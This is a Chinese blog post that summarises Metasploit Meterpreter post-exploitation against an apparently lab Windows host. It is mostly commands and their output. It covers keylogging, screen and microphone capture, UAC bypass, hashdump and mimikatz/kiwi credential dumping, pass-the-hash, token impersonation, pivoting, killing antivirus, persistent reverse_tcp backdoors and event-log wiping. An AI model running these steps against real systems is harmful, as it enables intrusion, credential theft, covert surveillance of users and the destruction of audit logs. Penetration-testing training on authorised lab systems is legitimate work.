当前位置:网站首页>MSF后渗透总结
MSF后渗透总结
2022-06-30 16:31:00 【qq_51550750】
文件
1.文件交互指令
| ID | Command | Description |
|---|---|---|
| 1 | cat | 读取文件内容 |
| 2 | cd | 切换靶机目录 |
| 3 | cp | 复制文件到目标 |
| 4 | mv | 移动到目标 |
| 5 | chmod | 修改文件权限(比如chmod 777 shell.elf) |
| 6 | del / rm | 删除靶机文件 |
| 7 | dir | 打印靶机目录 |
| 8 | mkdir | 在靶机上创建目录 |
| 9 | rmdir | 删除靶机目录 |
| 10 | edit | 编辑文件 |
| 11 | getlwd | 打印本地目录 |
| 12 | getwd | 打印靶机目录 |
| 13 | lcd | 更改本地目录 |
| 14 | lls | 列出本地目录 |
| 15 | ls | 列出靶机文件目录 |
| 16 | lpwd | 打印本地目录 |
| 17 | pwd | 打印工作目录 |
| 19 | search | 搜索文件 详情search -h |
2.上传下载文件
| Command | Description |
|---|---|
| upload | 传文件到靶机 |
| download | 从靶机下载文件 |
捕获控制设备信息
【1】捕获屏幕
可以使用以下命令捕获屏幕
screenshot
返回结果
meterpreter > screenshot
Screenshot saved to: /home/adian/ooTGibPg.jpeg
【2】捕获麦克风
命令
run sound_recorder
默认录制30秒声音,如果需要更长时间,需要使用-l参数
meterpreter > run sound_recorder
[*] Saving recorded audio to /root/.msf4/logs/scripts/sound_recorder/WIN-ITNJLFM93P3_20210520.1422
[*] Recording a total of 0m 30s
获取键盘记录
命令
run post/windows/capture/keylog_recorder
结果
[*] Executing module against WIN-ITNJLFM93P3_1.wav
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20210520231706_TestWin7_10.10.10.132_host.windows.key_377741.txt
[*] Recording keystrokes...
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
或者使用
keyscan_start
在捕获后可以使用
keyscan_dump
来获取内容
如果需要停止,使用以下命令
keyscan_stop
提升权限
使用以下命令获取权限等级
getuid
得到目前我们是system权限
Server username: NT AUTHORITY\SYSTEM
如果我们不是system权限,我们可以直接使用以下命令来提升权限
getsystem
有一次我提权失败了,于是我尝试绕过UAC提权:
首先
bg
把session保存下来
然后尝试依次利用下面两个模块进行提权:
use exploit/windows/local/bypassuac #该模块运行时会因为在目标机上创建多个文件而被杀毒软件识别,因此通过该模块提权成功率很低。
use exploit/windows/local/bypassuac_injection #该模块直接运行在内存的反射DLL中,所以不会接触目标机器的硬盘,从而降低了被杀毒软件检测出来的概率。
这两个模块在利用的时候,第一个没有成功,但是第二个就成功了。
挖掘用户名和密码
Windows系统存储哈希值的方式一般为LAN Manager(LM),NT LAN Manager(NTLM),或者NT LAN Manager V2(NTLMv2)
在msf中,我们可以使用hashdump命令获取系统所有用户名和密码的哈希值
hashdump
此命令需要system权限
传递哈希值登录
我们使用windows/smb/psexec模块来传递哈希值
我们将获取到的哈希值set给SMBUser和SMBPass,比如我们获取到hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
给SMBUser
Administrator
给SMBPass
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
破解纯文本密码
在Meterpreter下,使用Mimikatz获取密码
首先加载Mimikatz模块
load mimikatz
得到如下结果
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
在msf6中,mimikatz被kiwi替代了
The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
帮助文档如下
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unpars
ed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCS
ync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
kiwi拥有更全面的功能,基本保留了mimikatz的功能
meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
test WIN-ITNJLFM93P3 aad3b435b51404ee 31d6cfe0d16ae931 da39a3ee5e6b4b0d
aad3b435b51404ee b73c59d7e0c089c0 3255bfef95601890
afd80709
假冒令牌
steal_token
使用假冒令牌可以假冒某个网络中的另一个用户进行操作,如提升用户权限,创建用户和组等,当用户登录Windows时,会给他一个访问令牌作为认证会话的一部分。例如一个入侵用户可能需要以域管理员的身份执行操作,就需要使用假冒令牌的方式
使用ps指令查看当前运行的应用程序以及所对应的用户
ps
盗取令牌语法如下
steal_token PID
此时就是以盗取的用户身份执行
incognito
首先加载此模块
load incognito
执行命令
list_tokens -u
可以查看到所有可用令牌
使用如下命令进行假冒
impersonate_token domain\\name
注意是两个反斜杠
获取目标主机删除的文件
使用模块
post/windows/gather/forensics/recovery_files
设定DRIVE盘符和session id,即可进行恢复
将MeterpreterShell作为跳板渗透
使用以下命令获取当前子网
run get_local_subnets
得到如下结果
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
这里提示可以用post模块中的autoroute来自动配置路由
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against WIN-ITNJLFM93P3
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
vc6.Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth
我们也可以手动添加路由,首先需要先将shell放到后台
background
然后手动添加路由
route add 子网 掩码 会话ID
Meterpreter脚本
使用方法
run 脚本路径/名称
迁移进程
脚本
post/windows/manage/migrate
或者可以直接使用migrate迁移权限到指定PID
migrate PID
关闭杀毒软件
run killav
在msf6中虽然还可以使用,但是会提示已弃用
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
经过测试,无法识别出火绒杀毒,但是MS17-010攻击被火绒拦截
查看目标机器上所有流量
使用packetrecorder进行流量劫持,然后可以通过Wireshark进行分析
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-ITNJLFM93P3_20210521.5655/WIN-ITNJLFM93P3_20210521.5655.cap
[*] Packet capture interval is 30 Seconds
获取系统信息
通过scraper脚本可以列举处用户想要的所有信息
meterpreter > run scraper
[*] New session on 10.10.10.132:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\AoxTqVci.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\xaFqszRg.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\OqrObWNV.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\rAJZLqAf.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\esDrHZoB.reg)
[*] Cleaning HKU
[*] Completed processing on 10.10.10.132:445...
创建持久后门
使用persistence脚本和metsv创建持久后门
meterpreter > run persistence
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-ITNJLFM93P3_20210521.0320/WIN-ITNJLFM93P3_20210521.0320.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444
[*] Persistent agent script is 99668 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ArDebnpVV.vbs
[*] Executing script C:\Windows\TEMP\ArDebnpVV.vbs
[+] Agent executed with PID 2524
可以通过
run peresistence -h
来查看帮助信息,创建自定义后门
meterpreter > run metsvc
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Windows\TEMP\nzDwNmYr...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
使用multi/handler监听即可建立会话,此时注意handler的payload,否则session会close
将命令行shell升级为Meterpreter
可以直接
sessions -u ID
清除痕迹
直接使用irb即可
meterpreter > irb
[*] Starting IRB shell...
>>
在进入>>交互的时候选中要删除的日志
log = client.sys.eventlog.open(‘system’)
log = client.sys.eventlog.open(‘security’)
log = client.sys.eventlog.open(‘application’)
log = client.sys.eventlog.open(‘directory service’)
log = client.sys.eventlog.open(‘dns server’)
log = client.sys.eventlog.open(‘file replication service’)
最后删除
log.clear
或者使用clearev
meterpreter > clearev
[*] Wiping 299 records from Application...
[*] Wiping 939 records from System...
[*] Wiping 230 records from Security...
边栏推荐
猜你喜欢
Cesium-1.72 learning (earth rotation)
Cesium-1.72 learning (model attitude control)
Bridge emqx cloud data to AWS IOT through the public network
Generate confrontation network, from dcgan to stylegan, pixel2pixel, face generation and image translation.
Advanced Mathematics (Seventh Edition) Tongji University General exercises one person solution
将 EMQX Cloud 数据通过公网桥接到 AWS IoT
.NET ORM框架HiSql实战-第一章-集成HiSql
Tubes响应性数据系统的设计与原理
腾讯云的一场硬仗
IEEE TBD SCI影响因子提升至4.271,位列Q1区!
随机推荐
Rexroth hydraulic control check valve z2s10-1-3x/
Login box tricks
Cesium-1.72 learning (eagle eye map of the earth)
Design and principle of tubes responsive data system
splitting. JS password display hidden JS effect
5g business is officially commercial. What are the opportunities for radio and television?
Parker Parker sensor p8s-grflx
Map集合
TFTP download kernel, NFS mount file system
高等数学(第七版)同济大学 总习题一 个人解答
[C language] explain threads - thread separation function pthread_ detach
【架构】1366- 如何画出一张优秀的架构图
splitting.js密码显示隐藏js特效
[proteus simulation] Arduino uno uses 74ls148 to extend interrupt
K-line diagram must be read for quick start
Exploration and practice of "flow batch integration" in JD
【C语言】详解线程 — 多线程进行协同运算
生成对抗网络,从DCGAN到StyleGAN、pixel2pixel,人脸生成和图像翻译。
【剑指Offer】剑指 Offer 53 - II. 0~n-1中缺失的数字
Spin lock exploration